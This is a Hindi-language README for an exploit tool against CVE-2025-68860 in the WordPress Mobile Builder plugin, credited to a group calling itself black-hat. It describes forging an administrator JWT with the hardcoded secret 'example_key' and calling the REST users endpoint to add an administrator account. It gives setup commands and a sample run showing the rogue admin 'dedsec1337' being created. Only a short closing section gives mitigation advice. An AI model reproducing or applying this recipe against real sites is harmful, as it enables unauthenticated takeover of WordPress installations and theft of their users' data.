
CVE-2025-68860 के लिए एक्सप्लॉइट स्क्रिप्ट जो WordPress Mobile Builder प्लगिन को लक्षित करती है। हार्डकोडेड सीक्रेट का उपयोग करके जाली JWT टोकन उत्पन्न करता है ताकि व्यवस्थापक के रूप में प्रमाणित हो सके और REST API के माध्यम से नए व्यवस्थापक खाते बना सके।
WordPress Mobile Builder प्लगइन संस्करण 1.4.2 और उससे नीचे में टूटे हुए प्रमाणीकरण की कमजोरी है, जो हमलावर को डिफ़ॉल्ट रहस्य "example_key" के साथ एक मान्य JWT टोकन बनाने और व्यवस्थापक (user_id=1) के रूप में प्रमाणित करने की अनुमति देती है। उस टोकन के साथ, हमलावर एक नया व्यवस्थापक खाता बना सकता है और साइट पर कब्जा कर सकता है।
CVE: CVE-2025-68860
कारण: JWT के लिए हार्डकोडेड गुप्त कुंजी "example_key" का उपयोग, बिना पर्याप्त सत्यापन के।
कमजोरी का स्थान: Mobile Builder प्लगइन में, JWT प्रमाणीकरण को संभालने वाली फ़ाइल (जैसे class-jwt-auth.php) डिफ़ॉल्ट मान 'example_key' के साथ स्थिरांक JWT_SECRET का उपयोग करती है। यह गुप्त कुंजी सेटिंग्स के माध्यम से बदली नहीं जा सकती, इसलिए हमलावर किसी भी user_id के लिए टोकन बना सकता है।
प्रभाव: हमलावर user_id=1 (व्यवस्थापक) के लिए टोकन बना सकता है, REST API एंडपॉइंट तक पहुँच सकता है, और व्यवस्थापक भूमिका वाला नया उपयोगकर्ता बना सकता है।
CVSS: उच्च (स्कोर 8.8) - नेटवर्क वेक्टर, उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं।
स्क्रिप्ट एक JWT टोकन बनाती है जिसमें payload user_id: 1 (व्यवस्थापक) और secret "example_key" शामिल है।
टोकन का उपयोग /wp-json/wp/v2/users/ तक पहुँचने और व्यवस्थापक पहुँच की पुष्टि करने के लिए किया जाता है।
यदि सफल होता है, तो स्क्रिप्ट /wp-json/wp/v2/users पर POST अनुरोध भेजती है ताकि उपयोगकर्ता नाम dedsec1337, पासवर्ड admin, ईमेल [email protected], और भूमिका व्यवस्थापक के साथ एक नया उपयोगकर्ता बनाया जा सके।
आउटपुट क्रेडेंशियल और API प्रतिक्रिया प्रदर्शित करता है।
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
हमलावर एक नया व्यवस्थापक खाता बना सकता है, WordPress की सभी सुविधाओं तक पहुँच सकता है, दुर्भावनापूर्ण प्लगइन इंस्टॉल कर सकता है, सामग्री बदल सकता है, उपयोगकर्ता डेटा चुरा सकता है, या आगे के हमलों के लिए साइट का उपयोग कर सकता है।
इस कमजोरी का शोषण बिना किसी पूर्व प्रमाणीकरण के दूरस्थ रूप से किया जा सकता है।
प्रभाव: WordPress साइट का पूर्ण समझौता।
Mobile Builder प्लगइन को तुरंत नवीनतम संस्करण (>=1.4.3) में अपडेट करें।
यदि कोई अपडेट नहीं है, तो प्लगइन को अस्थायी रूप से अक्षम करें।
जाँच करें कि आपकी साइट पर कोई संदिग्ध उपयोगकर्ता तो नहीं है।
REST API एंडपॉइंट पर संदिग्ध अनुरोधों को ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें।
अस्थायी उपाय के रूप में, प्लगइन कोड में गुप्त कुंजी बदलें (यदि संभव हो) और REST API तक पहुँच को प्रतिबंधित करें।